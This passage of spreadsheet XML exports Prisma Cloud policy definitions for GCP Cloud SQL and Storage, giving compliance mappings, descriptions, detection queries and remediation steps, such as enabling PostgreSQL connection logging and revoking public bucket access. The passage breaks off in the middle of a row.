          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.6, jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, CIS Controls v7.1, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v8, PCI DSS v4.0, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, NIST SP 800-171 Revision 3, CRI Profile v1.2.1, CDC NIST 800-53 Rev4, CIS v1.3.0 (GCP), TX-RAMP Level 2, Rehan, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, HITRUST v.9.4.2 [Deprecated], CIS v2.0.0 (GCP) Level 1, NIST 800-53 Rev4, Fedramp (Low), ACSC Information Security Manual (ISM), Fedramp (Low), CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, jneytchev-fedramp-low, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS v1.1.0 (GCP), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, CIS v1.2.0 (GCP), NIST CSF, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, CIS v3.0.0 (GCP) Level 1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2978" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2978" s="2" t="inlineStr"/>
      <c r="D2978" t="inlineStr"/>
      <c r="E2978" t="inlineStr"/>
      <c r="F2978" t="inlineStr"/>
      <c r="G2978" t="b">
        <v>1</v>
      </c>
      <c r="H29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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2978" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2978" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_connections is disabled</t>
        </is>
      </c>
      <c r="L2978" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2978" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2978" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2978" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2978" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2978" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2978" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2978" t="inlineStr"/>
      <c r="T2978" t="b">
        <v>0</v>
      </c>
      <c r="U2978" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2978" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2978" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL type SQL instances for which the log_connections database flag is disabled. PostgreSQL does not log attempted connections by default. Enabling the log_connections setting will create log entries for each attempted connection as well as successful completion of client authentication which can be useful in troubleshooting issues and to determine any unusual connection attempts to the server.</t>
        </is>
      </c>
      <c r="X2978" t="inlineStr">
        <is>
          <t>1. Login to GCP Console
2. Navigate to SQL
3. Click on the PostgreSQL instance ID for which you want to enable the database flag from the list
4. Click on 'Edit'
NOTE: If the instance is stopped, You need to START the instance first to edit the configurations, then Click on EDIT.
5. Go to the 'Flags' section under 'Customize your instance'
6. To set a flag that has not been set on the instance before, click 'Add FLAG', choose the flag 'log_connections' from the drop-down menu and set the value as 'on'.
7. If it is already set to 'off' for 'log_connections', from the drop-down menu set the value as 'on'
8. Click on 'DONE' for the added/edited flag.
9. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-3
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-3</t>
        </is>
      </c>
      <c r="Y2978" t="inlineStr"/>
      <c r="Z2978" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains POSTGRES and (settings.databaseFlags[?(@.name=='log_connections')] does not exist or settings.databaseFlags[?(@.name=='log_connections')].value equals off)"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2978" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2978" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2978" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-530-CKV_GCP_52</t>
        </is>
      </c>
      <c r="AD2978" t="b">
        <v>1</v>
      </c>
      <c r="AE2978" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2978" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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8" t="inlineStr">
        <is>
          <t>ae01f28b-cfee-4c1d-b089-0cd0c1151f0d</t>
        </is>
      </c>
      <c r="AI2978" t="inlineStr">
        <is>
          <t>9d730b53-a7c7-4da2-9bd0-0822b9639d0d</t>
        </is>
      </c>
      <c r="AJ2978" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2978" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2979">
      <c r="A2979" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.6, Rehan, Sarbanes Oxley Act (SOX), CIS v2.0.0 (GCP) Level 1, APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, CIS v1.2.0 (GCP), ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, CIS Controls v7.1, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CIS Controls v8, PCI DSS v4.0, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, CRI Profile v1.2.1, TX-RAMP Level 2, Brazilian Data Protection Law (LGPD), HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), CIS v3.0.0 (GCP) Level 1, CSA CCM v4.0.12, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CIS v1.3.0 (GCP), FFIEC, PCI DSS v4.0, CIS v1.1.0 (GCP), ISO/IEC 27002:2013, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, NIST SP 800-172, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2979" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2979" s="2" t="inlineStr"/>
      <c r="D2979" t="inlineStr"/>
      <c r="E2979" t="inlineStr"/>
      <c r="F2979" t="inlineStr"/>
      <c r="G2979" t="b">
        <v>1</v>
      </c>
      <c r="H29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79" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2979" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2979" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_min_duration_statement is not set to -1</t>
        </is>
      </c>
      <c r="L2979" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2979" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2979" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2979" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2979" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2979" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2979" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2979" t="inlineStr"/>
      <c r="T2979" t="b">
        <v>0</v>
      </c>
      <c r="U2979" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2979" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2979" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_min_duration_statement is not set to -1. The log_min_duration_statement flag defines the minimum amount of execution time of a statement in milliseconds where the total duration of the statement is logged. Logging SQL statements may include sensitive information that should not be recorded in logs. So it is recommended to set  log_min_duration_statement flag value to -1 so that execution statements logging will be disabled.</t>
        </is>
      </c>
      <c r="X2979" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
NOTE: If the instance is stopped, You need to START instance first to edit the configurations, then Click on EDIT.
5. If the flag has not been set on the instance, 
Under 'Configuration options', click on 'Add item' in 'Flags' section, choose the flag 'log_min_duration_statement' from the drop-down menu and set the value as '-1'
OR
If the flag has been set to other than -1, Under 'Configuration options', In 'Flags' section choose the flag 'log_min_duration_statement' and set the value as '-1'
6. Click Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-8
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-8</t>
        </is>
      </c>
      <c r="Y2979" t="inlineStr"/>
      <c r="Z2979" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains POSTGRES and (settings.databaseFlags[?(@.name=='log_min_duration_statement')] does not exist or settings.databaseFlags[?(@.name=='log_min_duration_statement')].value does not equal -1)"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2979" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2979" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2979" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-545-CKV_GCP_57</t>
        </is>
      </c>
      <c r="AD2979" t="b">
        <v>1</v>
      </c>
      <c r="AE2979" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2979" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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79" t="inlineStr">
        <is>
          <t>45f30dc1-4253-4afb-987a-b09e26bfc166</t>
        </is>
      </c>
      <c r="AI2979" t="inlineStr">
        <is>
          <t>71cba764-0eb0-47c2-94b2-09721384752d</t>
        </is>
      </c>
      <c r="AJ2979" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2979" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2980">
      <c r="A2980" t="inlineStr"/>
      <c r="B2980" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2980" s="2" t="inlineStr"/>
      <c r="D2980" t="inlineStr"/>
      <c r="E2980" t="inlineStr"/>
      <c r="F2980" t="inlineStr"/>
      <c r="G2980" t="b">
        <v>1</v>
      </c>
      <c r="H29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jcalloway-autoremtation alert rule,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80" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2980" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2980" t="inlineStr">
        <is>
          <t>jcalloway - GCP Bucket Labels Policy</t>
        </is>
      </c>
      <c r="L2980" t="inlineStr"/>
      <c r="M2980" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2980" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2980" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2980" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2980" t="inlineStr"/>
      <c r="R2980" t="inlineStr"/>
      <c r="S2980" t="inlineStr"/>
      <c r="T2980" t="b">
        <v>1</v>
      </c>
      <c r="U2980" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2980" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2980" t="inlineStr">
        <is>
          <t>This is a custom policy designed to find GCP buckets owned by jcalloway in pcs-gcp-lab01.  It is for testing auto remediations.</t>
        </is>
      </c>
      <c r="X2980" t="inlineStr"/>
      <c r="Y2980" t="inlineStr">
        <is>
          <t>'description': 'Adds a label to the bucket environment:sandbox',
'cliScriptTemplate': 'gsutil label ch -l environment:sandbox gs:///$resourceName'</t>
        </is>
      </c>
      <c r="Z2980" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name= 'gcloud-storage-buckets-list' and json.rule = labels.owner equals "jcalloway" and labels.appid does not exist</t>
        </is>
      </c>
      <c r="AA2980" t="inlineStr">
        <is>
          <t>Jonathan Calloway</t>
        </is>
      </c>
      <c r="AB2980" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2980" t="inlineStr"/>
      <c r="AD2980" t="b">
        <v>0</v>
      </c>
      <c r="AE2980" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2980" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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jcalloway-autoremtation alert rule - Notifications:, AccountGroups:Default Account Group;,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80" t="inlineStr">
        <is>
          <t>4d3c7d90-1977-471a-8ca2-1fe53cee3908</t>
        </is>
      </c>
      <c r="AI2980" t="inlineStr">
        <is>
          <t>53828b6d-3d42-40f0-96fd-1a2cd9cabc6f</t>
        </is>
      </c>
      <c r="AJ2980" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2980" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2981">
      <c r="A2981" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, HIPAA, NIST CSF, NIST CSF v2.0, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, NIST 800-53 Rev 5, Australian Energy Sector Cyber Security Framework (AESCSF), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], Insurance Regulatory And Development Authority Of India, HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v9.3 [Deprecated], GDPR, Matt's ATT&amp;ACK, jbrox - GDPR, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v12, Copy of ACSC Information Security Manual (ISM)-clone, Microsoft Cloud Security Benchmark v1, ITSG-33, ISO 27002:2022, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v3.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v4.0.12, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), ITSG-33, ISO 27001:2013, TX-RAMP Level 2, kfirdaus AWS Account-CS, SOC 2, ITSG-33, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, New Zealand Information Security Manual (NZISM v3.4), CDC NIST 800-53 Rev4, NIST 800-53 Rev4, NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Brazilian Data Protection Law (LGPD), ISO 27001:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, NIST CSF, ITSG-33, MITRE ATT&amp;CK v6.3 [Deprecated], Microsoft Cloud Security Benchmark v1, CIS Controls v8, SOC 2, kfirdaus AWS Account-CS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, SOC 2, ISO/IEC 27001:2022, CIS Controls v8.1, NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, ITSG-33, APRA (CPS 234) Information Security, HIPAA, NIST CSF, PIPEDA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO 27002:2022, Copy of CIS Controls v8, SOC 2, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, CSA CCM v3.0.1, CCPA 2018, ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ACSC Information Security Manual (ISM), NIST CSF, DORA, TX-RAMP Level 2, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CSA CCM v3.0.1, HIPAA, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2981" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2981" s="2" t="inlineStr"/>
      <c r="D2981" t="inlineStr"/>
      <c r="E2981" t="inlineStr"/>
      <c r="F2981" t="inlineStr"/>
      <c r="G2981" t="b">
        <v>1</v>
      </c>
      <c r="H29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81" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2981" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2981" t="inlineStr">
        <is>
          <t>GCP Storage Buckets with publicly accessible GCP logs</t>
        </is>
      </c>
      <c r="L2981" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2981" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2981" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2981" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2981" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2981" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2981" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2981" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2981" t="b">
        <v>1</v>
      </c>
      <c r="U2981" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2981" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2981" t="inlineStr">
        <is>
          <t>Checks to ensure that Stackdriver logs on Storage Buckets are not  Giving public access to Stackdriver logs will enable anyone with a web association to retrieve sensitive information that is critical to business. Stackdriver Logging enables to store, search, investigate, monitor and alert on log information/events from Google Cloud Platform. The permission needs to be set only for authorized users.</t>
        </is>
      </c>
      <c r="X2981" t="inlineStr">
        <is>
          <t>To set an ACL, please refer to the URL given below. Make sure that no ACL is set to allow 'allUsers' or 'allAuthenticatedUsers' for the reported bucket.
https://cloud.google.com/storage/docs/access-control/create-manage-lists#set-an-acl</t>
        </is>
      </c>
      <c r="Y2981" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'storage.buckets.getIamPolicy' and 'storage.buckets.setIamPolicy' permissions. Successful execution will revoke 'allUsers' and 'allAuthenticatedUsers' permission access in GCP Storage buckets.",
'impact': 'Revokes permission from allusers and allAuthenticatedUsers to GCP Storage buckets',
'cliScriptTemplate': 'gsutil iam ch -d allUsers -d allAuthenticatedUsers gs://$resourceName'</t>
        </is>
      </c>
      <c r="Z2981" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-storage-buckets-list' AND json.rule = '($.acl[*].email exists and $.acl[*].email contains logging) and ($.acl[*].entity contains allUsers or $.acl[*].entity contains allAuthenticatedUsers)'</t>
        </is>
      </c>
      <c r="AA2981" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2981" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2981" t="inlineStr">
        <is>
          <t>PC-GCP-STO-131</t>
        </is>
      </c>
      <c r="AD2981" t="b">
        <v>1</v>
      </c>
      <c r="AE2981" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2981" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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81" t="inlineStr">
        <is>
          <t>4d476ad6-2344-46af-92d2-b6bcaa204fe0</t>
        </is>
      </c>
      <c r="AI2981" t="inlineStr">
        <is>
          <t>eddabf29-fa96-4e14-ab4d-74245824c212</t>
        </is>
      </c>
      <c r="AJ2981" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2981" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2982">
      <c r="A2982" t="inlineStr"/>
      <c r="B2982" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2982" s="2" t="inlineStr"/>
      <c r="D2982" t="inlineStr"/>
      <c r="E2982" t="inlineStr"/>
      <c r="F2982" t="inlineStr"/>
      <c r="G2982" t="b">
        <v>1</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2982" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2982" t="inlineStr">
        <is>
          <t>Sensitive data exposure risk due to unmonitored and publicly exposed Storage Bucket containing GCP Vertex AI pipeline output data</t>
        </is>
      </c>
      <c r="L2982" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2982" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2982" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2982" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2982" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2982" t="inlineStr"/>
      <c r="R2982" t="inlineStr"/>
      <c r="S2982" t="inlineStr"/>
      <c r="T2982" t="b">
        <v>0</v>
      </c>
      <c r="U2982" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2982" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2982" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed GCP Storage buckets that are used to store Vertex AI pipeline output data and do not have usage and storage logging enabled.
Storage bucket usage logs provide information for all of the requests made on a specified bucket and are created hourly and storage logs provide information about the storage consumption of that bucket for the last day and are created daily. Enabling usage and storage logs for the storage bucket containing sensitive Vertex AI pipeline output data enables monitoring access to Vertex AI pipeline output data and helps in traceback in case of security breaches.
It is recommended to enable usage and storage logging for the storage buckets containing Vertex AI pipeline output data.</t>
        </is>
      </c>
      <c r="X2982"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Follow the steps mentioned in the below link to enable Access and Storage logs:
Reference : https://cloud.google.com/storage/docs/access-logs</t>
        </is>
      </c>
      <c r="Y2982" t="inlineStr"/>
      <c r="Z2982" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-storage-buckets-list') and finding.name contains all ('GCP Storage Bucket storing GCP Vertex AI pipeline output data','GCP Storage buckets are publicly accessible to all users','GCP Storage buckets are publicly accessible to all authenticated users','GCP Storage Bucket does not have Access and Storage Logging enabled')</t>
        </is>
      </c>
      <c r="AA2982" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2982" t="inlineStr">
        <is>
          <t>2024-07-19 06:56:52</t>
        </is>
      </c>
      <c r="AC2982" t="inlineStr"/>
      <c r="AD2982" t="b">
        <v>1</v>
      </c>
      <c r="AE2982" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2982" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>58e2c326-e148-49e3-943e-6d218cd4e918</t>
        </is>
      </c>
      <c r="AI2982" t="inlineStr">
        <is>
          <t>3d45691a-7e6e-46c6-a6bb-c1f275891e20</t>
        </is>
      </c>
      <c r="AJ2982" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2982" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2983">
      <c r="A2983" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2983" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2983" s="2" t="inlineStr"/>
      <c r="D2983" t="inlineStr"/>
      <c r="E2983" t="inlineStr"/>
      <c r="F2983" t="inlineStr"/>
      <c r="G2983" t="b">
        <v>1</v>
      </c>
      <c r="H29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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2983" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2983" t="inlineStr">
        <is>
